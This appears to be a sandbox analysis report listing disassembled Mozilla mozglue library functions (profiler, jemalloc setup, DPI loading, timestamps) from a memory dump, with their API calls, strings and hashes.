API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
API String ID: 3889411031-3373514183
Opcode ID: ceb005bd9f7167d0175e969b03722446035b31860938caf6d5c9dcb107b67e32
Instruction ID: 05a639380cb3e607f18a4d291c0e13a450f55daf281cecbe0a835825e7ec4d66
Opcode Fuzzy Hash: ceb005bd9f7167d0175e969b03722446035b31860938caf6d5c9dcb107b67e32
Instruction Fuzzy Hash: 78E10671B043009BEB10DF24C994BAAB7F5EF95318F04896DE99587B80DF74A948CB92

Function 6C12E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C127090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C12B9F1,?), ref: 6C127107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C12DCF5), ref: 6C12E92D
GetCurrentThreadId.KERNEL32 ref: 6C12EA4F
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EA5C
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EA80
GetCurrentThreadId.KERNEL32 ref: 6C12EA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C12DCF5), ref: 6C12EA92
GetCurrentThreadId.KERNEL32 ref: 6C12EB11
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C12EB3C
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EB5B

Part of subcall function 6C125710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C12EB71), ref: 6C1257AB

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C12EBAC

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

GetCurrentThreadId.KERNEL32 ref: 6C12EBC1
AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000), ref: 6C12EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C12EBE5
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,00000000), ref: 6C12EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12EC46
CloseHandle.KERNEL32(?), ref: 6C12EC55
free.MOZGLUE(00000000), ref: 6C12EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C12EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C12EA9B

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: fb4a881338456b5223bb6899ec39abae4d2e52a1f32313af60a23c1b3a910293
Instruction ID: 0aaada6036323e3a17cf8c71e00fb1d67e681596e3288576a997ec89ee0383c9
Opcode Fuzzy Hash: fb4a881338456b5223bb6899ec39abae4d2e52a1f32313af60a23c1b3a910293
Instruction Fuzzy Hash: 34A15935700604CFDB10DF2AC854BBA77B5FF86318F14402AE92987F81DB389995DBA1

Function 6C12F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C12F8F9

Part of subcall function 6C0F6390: GetCurrentThreadId.KERNEL32 ref: 6C0F63D0
Part of subcall function 6C0F6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C0F63DF
Part of subcall function 6C0F6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C0F640E

ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F93A
GetCurrentThreadId.KERNEL32 ref: 6C12F98A
GetCurrentThreadId.KERNEL32 ref: 6C12F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F716

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

Part of subcall function 6C0EB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C0EB5E0

GetCurrentThreadId.KERNEL32 ref: 6C12F739
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F746
GetCurrentThreadId.KERNEL32 ref: 6C12F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C16385B,00000002,?,?,?,?,?), ref: 6C12F829
free.MOZGLUE(?,?,00000000,?), ref: 6C12F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C12F866
free.MOZGLUE(?), ref: 6C12FA0C

Part of subcall function 6C0F5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0F55E1), ref: 6C0F5E8C
Part of subcall function 6C0F5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F5E9D
Part of subcall function 6C0F5E60: GetCurrentThreadId.KERNEL32 ref: 6C0F5EAB
Part of subcall function 6C0F5E60: GetCurrentThreadId.KERNEL32 ref: 6C0F5EB8
Part of subcall function 6C0F5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F5ECF
Part of subcall function 6C0F5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C0F5F27
Part of subcall function 6C0F5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C0F5F47
Part of subcall function 6C0F5E60: GetCurrentProcess.KERNEL32 ref: 6C0F5F53
Part of subcall function 6C0F5E60: GetCurrentThread.KERNEL32 ref: 6C0F5F5C
Part of subcall function 6C0F5E60: GetCurrentProcess.KERNEL32 ref: 6C0F5F66
Part of subcall function 6C0F5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C0F5F7E

free.MOZGLUE(?), ref: 6C12F9C5
free.MOZGLUE(?), ref: 6C12F9DA

Strings

" attempted to re-register as ", xrefs: 6C12F858
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C12F9A6
Thread , xrefs: 6C12F789
[D %d/%d] profiler_register_thread(%s), xrefs: 6C12F71F

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 0b3aec4df99c017b1e4d341bef51c8b03cd0ab5a3fdf8a04b6387e16756c685b
Instruction ID: 30c6e9185e850c560721f006d24591d4ad46c35887e30b86db0d49f40909725b
Opcode Fuzzy Hash: 0b3aec4df99c017b1e4d341bef51c8b03cd0ab5a3fdf8a04b6387e16756c685b
Instruction Fuzzy Hash: 05814675A043109FDB00DF25C844BAAB7F5FF85308F40856DE8959BB51EB34E889CB92

Function 6C0F4180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0F4196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0F41F1
VerSetConditionMask.NTDLL ref: 6C0F4223
VerSetConditionMask.NTDLL ref: 6C0F422A
VerSetConditionMask.NTDLL ref: 6C0F4231
VerSetConditionMask.NTDLL ref: 6C0F4238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0F4245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0F4263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C0F427A
FreeLibrary.KERNEL32(?), ref: 6C0F4299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0F42C4
VerSetConditionMask.NTDLL ref: 6C0F42F6
VerSetConditionMask.NTDLL ref: 6C0F4302
VerSetConditionMask.NTDLL ref: 6C0F4309
VerSetConditionMask.NTDLL ref: 6C0F4310
VerSetConditionMask.NTDLL ref: 6C0F4317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0F4324

Strings

SetProcessDpiAwareness, xrefs: 6C0F4274
Shcore.dll, xrefs: 6C0F425E

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 28ca7df949dced918a6ecae9fe4c5737a39b4cdfd7edaf551beb5acad034031d
Instruction ID: 64194e266c141ebbe6531a2af4eca33ea7fdff10839acd5b1159ed3cdb3a59d9
Opcode Fuzzy Hash: 28ca7df949dced918a6ecae9fe4c5737a39b4cdfd7edaf551beb5acad034031d
Instruction Fuzzy Hash: 775125B1A042106BEB106BA5CD08FBA77BCEF86714F014628FE119B6C0DB74DD91DBA0

Function 6C12EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12EE60
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EE6D
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12EEA5
CloseHandle.KERNEL32(?), ref: 6C12EEB4
free.MOZGLUE(00000000), ref: 6C12EEBB
GetCurrentThreadId.KERNEL32 ref: 6C12EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12EECF

Part of subcall function 6C12DE60: GetCurrentThreadId.KERNEL32 ref: 6C12DE73
Part of subcall function 6C12DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C0F4A68), ref: 6C12DE7B
Part of subcall function 6C12DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C0F4A68), ref: 6C12DEB8
Part of subcall function 6C12DE60: free.MOZGLUE(00000000,?,6C0F4A68), ref: 6C12DEFE
Part of subcall function 6C12DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C12DF38

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

GetCurrentThreadId.KERNEL32 ref: 6C12EF1E
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EF2B
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EF59
GetCurrentThreadId.KERNEL32 ref: 6C12EFB0
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EFBD
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EFE1
GetCurrentThreadId.KERNEL32 ref: 6C12EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F000

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C12F02F

Part of subcall function 6C12F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C12F09B
Part of subcall function 6C12F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C12F0AC
Part of subcall function 6C12F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C12F0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C12F008
[I %d/%d] profiler_stop, xrefs: 6C12EED7

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 34edd9f9a33b2d31cac15aaa5764972de975bfce5bc237f93b9944b290b8da83
Instruction ID: 46c37604ba308a39da14913b8fd1d14be99a47ff7264c5973ddd34334f9463c6
Opcode Fuzzy Hash: 34edd9f9a33b2d31cac15aaa5764972de975bfce5bc237f93b9944b290b8da83
Instruction Fuzzy Hash: 9451133A6042109FDB00AB7BD4087B577B8EF4632DF100569F93583F80DB384998EBA6

Function 6C11D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C16E804), ref: 6C11D047
GetSystemInfo.KERNEL32(?), ref: 6C11D093
__Init_thread_footer.LIBCMT ref: 6C11D0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C16E810,00000040), ref: 6C11D0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C16E7B8,00001388), ref: 6C11D147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C16E744,00001388), ref: 6C11D162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C16E784,00001388), ref: 6C11D18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C16E7DC,00001388), ref: 6C11D1B1

Strings

MOZ_CRASH(), xrefs: 6C11D277
<jemalloc>, xrefs: 6C11D268, 6C11D311
: (malloc) Unsupported character in malloc options: ', xrefs: 6C11D322
MALLOC_OPTIONS, xrefs: 6C11D0CB
Compile-time page size does not divide the runtime one., xrefs: 6C11D26D

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 7ea4e9c7a7d6f203c8960748088ecfb7c06919b10bbf728844e7e91ebf0d43c1
Instruction ID: 14ab3bd9e53ae31afe4ef25f672fb6cec490e0df36a71a606f30b3db632c5674
Opcode Fuzzy Hash: 7ea4e9c7a7d6f203c8960748088ecfb7c06919b10bbf728844e7e91ebf0d43c1
Instruction Fuzzy Hash: AB81EF70B082109FEB01AF6ACD54B79BBB8EF56308F100239E91197F80D7799A15DBD2

Function 6C12FAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C12FADC
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12FAE9
GetCurrentThreadId.KERNEL32 ref: 6C12FB31
GetCurrentThreadId.KERNEL32 ref: 6C12FB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C12FBF6
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12FC50

Strings

[D %d/%d] profiler_unregister_thread: %s, xrefs: 6C12FC94
[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C12FD15

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: 08355f5f9891cd0edbf34a9a1b6157779baf5bfa186e7e665e60fb9901cc8bfe
Instruction ID: a26efe8b593a76c9645a13e0871d6560da133d2757ee334edfd57539f1d8d742
Opcode Fuzzy Hash: 08355f5f9891cd0edbf34a9a1b6157779baf5bfa186e7e665e60fb9901cc8bfe
Instruction Fuzzy Hash: B0711479A04710CFD710DF2AC448B6AB7F0FF85308F01856DE8658BB51EB38A895CB91

Function 6C0F5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F5E9D

Part of subcall function 6C105B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C1056EE,?,00000001), ref: 6C105B85
Part of subcall function 6C105B50: EnterCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105B90
Part of subcall function 6C105B50: LeaveCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105BD8
Part of subcall function 6C105B50: GetTickCount64.KERNEL32 ref: 6C105BE4

GetCurrentThreadId.KERNEL32 ref: 6C0F5EAB
GetCurrentThreadId.KERNEL32 ref: 6C0F5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C0F6017

Part of subcall function 6C0E4310: moz_xmalloc.MOZGLUE(00000010,?,6C0E42D2), ref: 6C0E436A
Part of subcall function 6C0E4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0E42D2), ref: 6C0E4387

moz_xmalloc.MOZGLUE(00000004), ref: 6C0F5F47
GetCurrentProcess.KERNEL32 ref: 6C0F5F53
GetCurrentThread.KERNEL32 ref: 6C0F5F5C
GetCurrentProcess.KERNEL32 ref: 6C0F5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C0F5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C0F5F27

Part of subcall function 6C0FCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0F55E1), ref: 6C0F5E8C

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0F55E1), ref: 6C0F605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0F55E1), ref: 6C0F60CC

Strings

GeckoMain, xrefs: 6C0F5ECE, 6C0F6015

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: ae73b46fe84be6d7bc8313183c8c3a5292cd2e242e14d9c2b671641670e617aa
Instruction ID: ac5c0661013d011dd8802cec946cddaf9493b17dd29cfc07ae6cfb556b0b8b5b
Opcode Fuzzy Hash: ae73b46fe84be6d7bc8313183c8c3a5292cd2e242e14d9c2b671641670e617aa
Instruction Fuzzy Hash: 6071E2B0A057408FD710DF29C480B6ABBF0FF59308F54496DE89687B52D730E999CB92

Function 6C0F9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0E31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C0E3217
Part of subcall function 6C0E31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C0E3236
Part of subcall function 6C0E31C0: FreeLibrary.KERNEL32 ref: 6C0E324B
Part of subcall function 6C0E31C0: __Init_thread_footer.LIBCMT ref: 6C0E3260
Part of subcall function 6C0E31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C0E327F
Part of subcall function 6C0E31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0E328E
